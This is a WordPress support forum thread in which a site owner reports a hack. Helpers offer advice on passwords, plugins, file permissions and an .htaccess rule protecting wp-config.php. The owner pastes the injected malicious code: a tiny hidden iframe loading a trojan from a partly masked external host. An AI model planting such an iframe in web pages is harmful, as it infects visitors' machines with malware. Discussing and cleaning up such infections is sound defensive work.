Did you upload all new files? Or just some new files?
Did you change passwords for all of your non-subscriber users? That is, all of your users with better than read-only permissions.
Why? Fun and/or profit.
How? Hard to say without access to the server, which no one here has. Perhaps your host can help. If it is a flaw in your site it is usually either a bad passwords or a vulnerability in a plugin or theme. If you are on a shared server, a vulnerability in any of the sites, not just yours, can allow a hacker access to all or some of the other sites too.
FAQ: My Site Was Hacked
as long as i know, there is a bug exploit within wp-config.php via sy*l*nk or ju*pl*nk.
i get this info from my friend about few hours ago. Try to protect your wp-config.php with .htaccess so your wp-config.php only accessible from your cpanel only.
What is the exploit and how is it prevented? Mentioning it in passing doesn’t really help anyone. If you are referring to what I think you are, that is really an Apache (mis)configuration problem, but something to be aware of nonetheless.
deny access to your wp-config.php, just it.
Thread Starter
v00d0
(@v00d0)
ye fresh files. anyway they put this iframe that link to a trojan that jump into ur tmp local folder.
Could perhaps be the result of an FTP leak. Have you changed all of your passwords – including FTP?
Thread Starter
v00d0
(@v00d0)
ye im doing it right now. thanks for the advice ill let you know if they do it again.
@blacklizt, I know how several different ways to deny access to wp-config. People posting here asking for help, probably don’t know. That is why they are asking. What you are saying is probably correct, but not very helpful and it is a ‘help’ forum. So, exactly what would you do to deny access to wp-config.php?
It would also help if you could explain the exploit because I only see one line that might be vulnerable and it would be very, very difficult to pull off.
@v00d0, you aren’t really giving enough information for anyone to help you. Please try to be more specific. For example, do you know what the trojan was? Can a scanner like Sucuri identify it? This should help: http://codex.wordpress.org/Hardening_WordPress
Thread Starter
v00d0
(@v00d0)
the tojan was identified by my ESET Antivirus. I can put here the iframe that link to the trojan but i don’t know if i can do it.
These are all the information i got:
– wordpress 3.4.1
– iframe inside root website files that link to a trojan
– if i reupload all the files they still can access my site
– i changed all the password.
this is the website:
consoleopen.com
Be sure to clear the Hyper Cache data.
I don’t know that posting the iframe would help. I am trying to find out the name of the trojan/exploit, if it has a name, in order to help identify how it got there.
If you re-uploaded all files then the problem is a bad password in the database, you missed a few files, you have a vulnerable plugin or theme, or there is a bigger problem with your server configuration/environment. You are running several plugins and your theme has some custom Javascript. Is everything up-to-date?
What are the file permissions on your server?
Thread Starter
v00d0
(@v00d0)
the permissions are Ok folder 755 files 644
this was the ifrAME
iframe src=”http://starttraffik.**/” width=”2″ height=”3″ frameborder=”0″></iframe>
check the website at ur risk (is .net). the theme was developed for my website they never updated it.
this is the list of my plugins:
advertising manager
contact foorm 7
google analyticator
google xml sitemaps
hhyper cache
my brand login
new admanplatinum seo packreally simple captcha
related post category widget
shadowbox js
shadowbox js- use title from image
static random post widget
statpress
widget logic
wordpress database backup
youtuber
to prevent wp-config.php exploit via symlinks.
add code below within your .htaccess
<Files wp-config.php>
order allow,deny
deny from all
</Files>
you can find many articles about symlinks on google. It’s old issue but still happen now.
actually wordpress codex already explain how to secure wp-config.php
http://codex.wordpress.org/Hardening_WordPress but not all wordpress users know about this.
How about your plugins? Are they all updated? Are any of them really old and haven’t been maintained?
I am assuming you are shared hosting? Is that correct?
Thread Starter
v00d0
(@v00d0)
no! i pay a dedicated server, plugins are all Uptodate, it seems.
